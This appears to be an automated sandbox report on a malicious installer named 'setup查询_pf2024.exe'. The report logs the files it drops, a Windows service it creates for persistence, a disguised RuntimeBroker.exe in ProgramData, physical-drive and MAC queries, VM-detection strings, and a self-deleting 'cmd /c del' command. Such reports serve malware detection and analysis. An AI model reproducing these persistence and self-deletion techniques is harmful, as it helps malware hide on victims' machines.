                    Source: Binary string: E:\dailybuild_dev\wegame_client\build\lib\Release\common.pdb source: setup#U67e5#U8be2_pf2024.exe, common.dll.0.dr
                    Source: Binary string: E:\dailybuild_dev\wegame_client\build\bin\Release\wegame.pdb source: setup#U67e5#U8be2_pf2024.exe, Wegame.exe.0.dr
                    Source: Binary string: kkeyfuncencryptionPBE2PARAMkeylengthprfPBKDF2PARAMcrypto\asn1\p5_pbev2.ccrypto\evp\p5_crpt2.cassertion failed: keylen <= sizeof(key)crypto\hmac\hmac.ccrypto\pkcs12\p12_key.cxn--compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: Wegame.exe, 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\apps\setup.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: wextract.pdbe\setup\iexpress\wextract\obj\i386\wextract.pdbU source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\install\InstUtil\tools\toolsinstutil.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\apps\upgrader9x\Upgrader9x.pdbT} source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: d:\re\puppet\workspace\8-2-build-windows-i586-cygwin\jdk8u60\4407\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: setup#U67e5#U8be2_pf2024.exe, kill.exe.0.dr
                    Source: Binary string: D:\build\ob\bora-17171714\bora\build\build\vmui\release\win32\vmware.pdb source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\apps\setup.pdbHyB source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: \loaddll\Release\libcef.pdbPkl source: RuntimeBroker.exe, 00000006.00000002.3338332862.000000006C6B3000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\install\InstUtil\cacheMod\cacheMod.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: \loaddll\Release\libcef.pdb source: setup#U67e5#U8be2_pf2024.exe, libcef.dll.0.dr
                    Source: Binary string: keyfuncencryptionPBE2PARAMkeylengthprfPBKDF2PARAMcrypto\asn1\p5_pbev2.ccrypto\evp\p5_crpt2.cassertion failed: keylen <= sizeof(key)crypto\hmac\hmac.ccrypto\pkcs12\p12_key.cxn--compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: setup#U67e5#U8be2_pf2024.exe, common.dll.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\apps\upgrader9x\Upgrader9x.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: \loaddll\Release\libcef.pdbP source: setup#U67e5#U8be2_pf2024.exe, libcef.dll.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\install\InstUtil\toolsNT\NTinstutil.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: E:\dailybuild_dev\wegame_client\build\bin\Release\wegame.pdbhh1GCTL source: setup#U67e5#U8be2_pf2024.exe, Wegame.exe.0.dr
                    Source: Binary string: e\setup\iexpress\wextract\obj\i386\wextract.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_00462960 __EH_prolog3_GS,memset,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?get_workingdir_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ,??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z,GetPrivateProfileStringW,GetPrivateProfileStringW,memset,GetPrivateProfileStringW,SimpleUString::operator=,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,SimpleUString::operator=,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z,??_0path@filesystem@ierd_tgp@@QAEAAV012@ABV012@@Z,??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z,PathFileExistsW,PathFileExistsA,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?get_app_sub_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V45@@Z,?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z,LoadLibraryW,GetProcAddress,?get_log_instance@base@@YAPAVILogger@1@XZ,3_2_00462960
                    Source: jli.dll.0.drStatic PE information: real checksum: 0x2ae97 should be: 0x2d1ab
                    Source: libcef.dll.0.drStatic PE information: real checksum: 0xc6b7 should be: 0x13bf0
                    Source: common.dll.0.drStatic PE information: section name: .QMGuid
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0046E40B push ecx; ret 3_2_0046E41E
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0046FAB6 push ecx; ret 3_2_0046FAC9
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_10025DC0 push eax; ret 3_2_10025DEE
                    Source: C:\Users\Statr\kill.exeCode function: 4_2_003B1695 push ecx; ret 4_2_003B16A8
                    Source: C:\Users\Statr\kill.exeCode function: 4_2_6C7B7630 push ecx; ret 4_2_6C7B7643
                    Source: C:\Users\Statr\kill.exeCode function: 4_2_6C7BC825 push ecx; ret 4_2_6C7BC838
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005DADBE push ecx; ret 6_2_005DADD1
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005DB466 push ecx; ret 6_2_005DB479
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_6C6B2A85 push ecx; ret 6_2_6C6B2A98
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_0352C384 push eax; ret 6_2_0352C3B2
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_0352EBD6 push cs; iretd 6_2_0352EBAA
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_0352EAD4 push cs; iretd 6_2_0352EBAA
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_0352F9AD push ebp; retf 6_2_0352F9B0
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_0352ED86 push ebx; ret 6_2_0352ED87
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_1000B780 push eax; ret 6_2_1000B7AE
                    Source: setup#U67e5#U8be2_pf2024.exeStatic PE information: section name: .text entropy: 7.453269170375049

                    Persistence and Installation Behavior

                    Source: C:\Users\Wegame\Wegame.exeCode function: __EH_prolog3_GS,memset,__snprintf_s,CreateFileA,memset,memset,DeviceIoControl,memset,memset,memset,isalnum,isalnum,GetLastError,CloseHandle, \\.\PhysicalDrive%d3_2_6BD8477F
                    Source: C:\Users\Wegame\Wegame.exeCode function: __EH_prolog3_GS,memset,__snprintf_s,CreateFileA,memset,DeviceIoControl,memset,memset,DeviceIoControl,FindCloseChangeNotification, \\.\PhysicalDrive%d3_2_6BD84503
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\wm.exe
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\ProgramData\libcef.dll
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Wegame\adapt_for_imports.dll
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Wegame\Wegame.exe
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Statr\kill.exe
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\ProgramData\RuntimeBroker.exe
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Statr\jli.dll
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Wegame\Lua51.dll
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Wegame\common.dll
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0045EA47 __EH_prolog3_catch_GS,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,SimpleUString::operator=,?Instance@CrashReportLoader@crash_report@@SAAAV12@XZ,?Instance@CrashReportLoader@crash_report@@SAAAV12@XZ,?AddCrashReportHelperFile@CrashReportLoader@crash_report@@QAEHPB_W00K@Z,?AddCrashReportHelperFile@CrashReportLoader@crash_report@@QAEHPB_W00K@Z,?Instance@CrashReportLoader@crash_report@@SAAAV12@XZ,?AddCrashReportHelperFile@CrashReportLoader@crash_report@@QAEHPB_W00K@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,WaitForSingleObject,?file_exists@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,??Bios_base@std@@QBE_NXZ,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?SetCrashInfo@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABUCrashInfo@234@@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?GetLastLoginedUin@common@ierd_tgp@@YA_KXZ,FindWindowW,GetTickCount,PostMessageA,SimpleUString::operator=,?scale_path2absolute_path@common@ierd_tgp@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV34@@Z,GetPrivateProfileIntW,?get_log_instance@base@@YAPAVILogger@1@XZ,WritePrivateProfileStringW,SimpleUString::operator=,?scale_path2absolute_path@common@ierd_tgp@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV34@@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z,GetTickCount,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?GetCurrentStage@Qos@qos@adapt_for_imports@ierd_tgp@@QAE?AW4ProcessStage@234@XZ,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@W4Qos_occasion@234@@Z,OutputDebugStringA,Sleep,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,3_2_0045EA47
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0045F2B4 ?GetLastLoginedUin@common@ierd_tgp@@YA_KXZ,FindWindowW,GetTickCount,PostMessageA,SimpleUString::operator=,?scale_path2absolute_path@common@ierd_tgp@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV34@@Z,GetPrivateProfileIntW,?get_log_instance@base@@YAPAVILogger@1@XZ,WritePrivateProfileStringW,SimpleUString::operator=,?scale_path2absolute_path@common@ierd_tgp@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV34@@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z,GetTickCount,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?GetCurrentStage@Qos@qos@adapt_for_imports@ierd_tgp@@QAE?AW4ProcessStage@234@XZ,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@W4Qos_occasion@234@@Z,Sleep,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,3_2_0045F2B4
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0046176A __EH_prolog3_GS,?GetUpdatedFilePath@silence_update@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PB_W0@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z,?exists@filesystem@ierd_tgp@@YA_NABVpath@12@@Z,?remove_filename@path@filesystem@ierd_tgp@@QAEAAV123@XZ,GetPrivateProfileIntW,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,3_2_0046176A

                    Boot Survival

                    Source: C:\Users\Wegame\Wegame.exeCode function: __EH_prolog3_GS,memset,__snprintf_s,CreateFileA,memset,memset,DeviceIoControl,memset,memset,memset,isalnum,isalnum,GetLastError,CloseHandle, \\.\PhysicalDrive%d3_2_6BD8477F
                    Source: C:\Users\Wegame\Wegame.exeCode function: __EH_prolog3_GS,memset,__snprintf_s,CreateFileA,memset,DeviceIoControl,memset,memset,DeviceIoControl,FindCloseChangeNotification, \\.\PhysicalDrive%d3_2_6BD84503
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Wegame\adapt_for_imports.dll
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Wegame\Wegame.exe
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Statr\kill.exe
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Statr\jli.dll
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Wegame\Lua51.dll
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Wegame\common.dll
                    Source: C:\ProgramData\RuntimeBroker.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Rsgiyy icwocqug
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_035282E4 GetModuleFileNameA,ExpandEnvironmentStringsA,_strncoll,wsprintfA,CopyFileA,SetFileAttributesA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,RegOpenKeyA,lstrlen,RegSetValueExA,6_2_035282E4

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\SETUP#~1.EXE > nul
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\SETUP#~1.EXE > nulJump to behavior
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005D9B29 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_005D9B29
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Wegame\Wegame.exe Code function: 3_2_00462478 __EH_prolog3_GS,?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z,GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,SimpleUString::operator=,?extract_name@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV34@@Z,OpenProcess,SetLastError,TerminateProcess,GetLastError,?get_log_instance@base@@YAPAVILogger@1@XZ,CloseHandle,Process32NextW,CloseHandle,3_2_00462478
                    Source: C:\Users\Wegame\Wegame.exe Code function: ?get_first_mac@common@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ,__EH_prolog3_catch_GS,GetAdaptersInfo,GetAdaptersInfo,?get_log_instance@base@@YAPAVILogger@1@XZ,__Init_thread_footer,3_2_6BD874A3
                    Source: C:\Users\Wegame\Wegame.exe Code function: memset,GetSystemDirectoryA,PathAppendA,LoadLibraryA,GetProcAddress,GetAdaptersInfo,memset,FreeLibrary,memset,3_2_6BD84E56
                    Source: C:\Users\Wegame\Wegame.exe Window / User API: threadDelayed 6149
                    Source: C:\ProgramData\RuntimeBroker.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe Dropped PE file which has not been started: C:\Users\wm.exe
                    Source: C:\Users\Statr\kill.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                    Source: C:\Users\Statr\kill.exe API coverage: 9.4 %
                    Source: C:\ProgramData\RuntimeBroker.exe API coverage: 6.0 %
                    Source: C:\Users\Wegame\Wegame.exe TID: 6932 Thread sleep time: -30745s >= -30000s
                    Source: C:\Users\Wegame\Wegame.exe File opened: PhysicalDrive0
                    Source: C:\Users\Wegame\Wegame.exe Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\ProgramData\RuntimeBroker.exe Last function: Thread delayed
                    Source: C:\Users\Wegame\Wegame.exe Thread sleep count: Count: 6149 delay: -5
                    Source: C:\ProgramData\RuntimeBroker.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\Wegame\Wegame.exe Code function: 3_2_00463A3A __EH_prolog3_GS,memset,GetModuleFileNameW,?filename@path@filesystem@ierd_tgp@@QBE?AV123@XZ,?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ,memset,FindFirstFileW,memset,wcsncpy_s,wcsncat_s,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindClose,3_2_00463A3A
                    Source: C:\Users\Wegame\Wegame.exe Code function: 3_2_0045E17A __EH_prolog3_GS,memset,GetEnvironmentVariableW,?get_log_instance@base@@YAPAVILogger@1@XZ,memset,GetModuleFileNameW,wcsrchr,SimpleUString::operator=,memset,GetFileAttributesW,memset,memset,FindFirstFileW,memset,wcscmp,SimpleUString::operator=,wcscmp,wcscmp,FindNextFileW,FindClose,?get_log_instance@base@@YAPAVILogger@1@XZ,3_2_0045E17A
                    Source: C:\Users\Wegame\Wegame.exe Code function: 3_2_0040F650 _invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,memset,FindFirstFileW,wcscpy_s,_invalid_parameter_noinfo_noreturn,3_2_0040F650
                    Source: C:\Users\Wegame\Wegame.exe Code function: 3_2_0045DF3C __EH_prolog3_GS,memset,memset,FindFirstFileW,memset,wcscmp,wcscmp,memset,DeleteFileW,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,FindNextFileW,FindClose,RemoveDirectoryW,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,3_2_0045DF3C
                    Source: C:\ProgramData\RuntimeBroker.exe Code function: 6_2_005F18B3 FindFirstFileExW,6_2_005F18B3
                    Source: C:\ProgramData\RuntimeBroker.exe Code function: 6_2_03522164 SHGetSpecialFolderPathA,FindFirstFileA,6_2_03522164
                    Source: C:\ProgramData\RuntimeBroker.exe Code function: 6_2_10001560 SHGetSpecialFolderPathA,FindFirstFileA,6_2_10001560
                    Source: C:\Users\Wegame\Wegame.exe Code function: 3_2_00401125 GetSystemInfo,3_2_00401125
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe File opened: C:\Users\user\AppData
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe File opened: C:\Users\user
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe File opened: C:\Users\user\AppData\Roaming
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: winPre2k.iso.0.drBinary or memory string: VMware
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: s VMGuestLibHandle.html
                    Source: winPre2k.iso.0.drBinary or memory string: VMwareUser.exe
                    Source: wm.exe.0.drBinary or memory string: VMware, Inc.1!0
                    Source: winPre2k.iso.0.drBinary or memory string: 1) Si le programme d'installation de VMware Tools vous invite
                    Source: winPre2k.iso.0.drBinary or memory string: @[Error] Failed to create helper UI.enableHelperUI:[HelperUI]: Received unknown progress message[HelperUI]: Ignoring tick count adjustment[HelperUI]: Received progress set step message[HelperUI]: Received negative tick count[HelperUI]: received progress reset message[[HelperUI]: MessageType: %Xh Message: %s[HelperUI]: Received message from wrong context: %s[HelperUI]: Received no context with the message.[Resource] lpName = %s NOT FOUND[Resource] lpName = %s, lpBuf = %sSystem\CurrentControlSet\Control\ProductOptionsProductSuiteTerminal Server_MSISETUP_{29569BA1-9B5A-4699-8698-3571369A69CA}Global\_MSISETUP_{29569BA1-9B5A-4699-8698-3571369A69CA}CheckTokenMembershipadvapi32.dllSeShutdownPrivilegeAdjustTokenPrivilegesLookupPrivilegeValueAOpenProcessToken%s%s\%sSOFTWARE\VMware, Inc.CoreSOFTWARE\VMware, Inc.\VMware ToolsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\ProductsSOFTWARE\Classes\Installer\ProductsSOFTWARE\Classes\Installer\FeaturesInstaller\ProductsInstaller\Features[Error] Failed to munge product code %s%d
                    Source: winPre2k.iso.0.drBinary or memory string: Invalid keyName in Util_IsKeyEmptyFailed to open key %sBegin LoggingUnable to log to intended file %s, error %dvminstutil.logvminst.logEnd LoggingFailure reallocating memory.Failure allocating memoryError reading already existing value %dComponentsSOFTWARE\VMware, Inc.Empty string detectedNull parameter detected.Returning InstallPath=%sAttaching to window with title "%s"Failed to get window text: %dFailed to find installer windowMsiDialogCloseClassWndDid not find file/directory: "%s"Found "%s"Not a directory: %d - %sLoaded library %s(%d)Failed to load library %s: %dInvalid keyName in DeleteKey
                    Source: winPre2k.iso.0.drBinary or memory string: es uniquement par ce produit VMware. S
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: VMGuestLibErrorException.html
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246415889.0000000002025000.00000004.00000020.00020000.00000000.sdmp, setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246415889.0000000001F64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: winPre2k.iso.0.drBinary or memory string: SOFTWARE\VMware, Inc.\NeedReboot
                    Source: winPre2k.iso.0.drBinary or memory string: VMwareTrackCursorTrayIcon
                    Source: winPre2k.iso.0.drBinary or memory string: AVMware Tools.msi
                    Source: winPre2k.iso.0.drBinary or memory string: 1) Run InstMsi.exe in the "msi" directory of the VMware Tools CD
                    Source: wm.exe.0.drBinary or memory string: ?ShowVmnetcfg@vmnetcfg@util@wui@@YAXXZC
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: hgfs.dll
                    Source: winPre2k.iso.0.drBinary or memory string: VMwareService.exeNT
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: vmGuestLibTest.c
                    Source: winPre2k.iso.0.drBinary or memory string: Instructions pour l'installation de VMware Tools sur un client Windows NT avec un Service Pack version 6 ou inf
                    Source: wm.exe.0.drBinary or memory string: buffy@&!*@*@(msg.vmui.library.notPoweredOn)Unable to connect to this virtual machine because it is not powered on. To power on the virtual machine, login to the VMware vCloud Air at: http://www.vmware.com/go/vcloud_login@&!*@*@(msg.vmui.library.removePromptFmt)Remove "%s" from the library?
                    Source: winPre2k.iso.0.drBinary or memory string: VMware Tools
                    Source: wm.exe.0.drBinary or memory string: vmwarebase.DLL
                    Source: winPre2k.iso.0.drBinary or memory string: Diese Version des VMware-Produkts ist zu alt. Sie k
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: [Info] Patch is a MINPATCH (small or minor update patch). Using default command line '%s'[Error] Failed to get system directory: %d[WARNING] Unable to return to the previous working directory[Info] Returned to [%s][WARNING] Unable to change current path[Info] Uninstall reboot required[Error] Failed to uninstall product (%d)[Info] Uninstall reboot initiated[Info] CWD = [%s][Info] Properties passed to msiexec is %s[Error] Failed to delete run once value %dvmreboot.tmp[Info] Uninstalled %s[Info] Uninstall successful[Error] Can't re-nest installer[Info] User cancelled uninstall[Info] Uninstalling with props: %s[Error] Can't un-nest installer[Error] Failed to create uninstallation UI[Error] Failed to set run once key %d[Error] Failed to open run once key %d[Info] Reinstall command is: %s%s /i "%s" %s /i REBOOT=ReallySuppress NO_UNINSTALL_MEMCTL=1 NO_UNINSTALL_VMDESCHED=1 NO_UNINSTALL_VMXNET=1 NO_UNINSTALL_SVGA=1 NO_UNINSTALL_SYNC=1 NO_UNINSTALL_MOUSE=1 NO_UNINSTALL_HGFS=1 NO_UNINSTALL_BUSLOGIC=1 VM_UPGRADE_UNINSTALL=1 [Error] Can't get name of installed product %s\msiexec.exe[Info] MSI logging to "%s"[Error] Failed to enable MSI logging: %d[Error] Failed to get temp path name for MSI log: %d [Info] Unable to process product code. Will treat as first time install[Info] The product code '%s' is known[Info] The product code '%s' is unknown. Use first time install logic.[Info] The product ver is the same. 
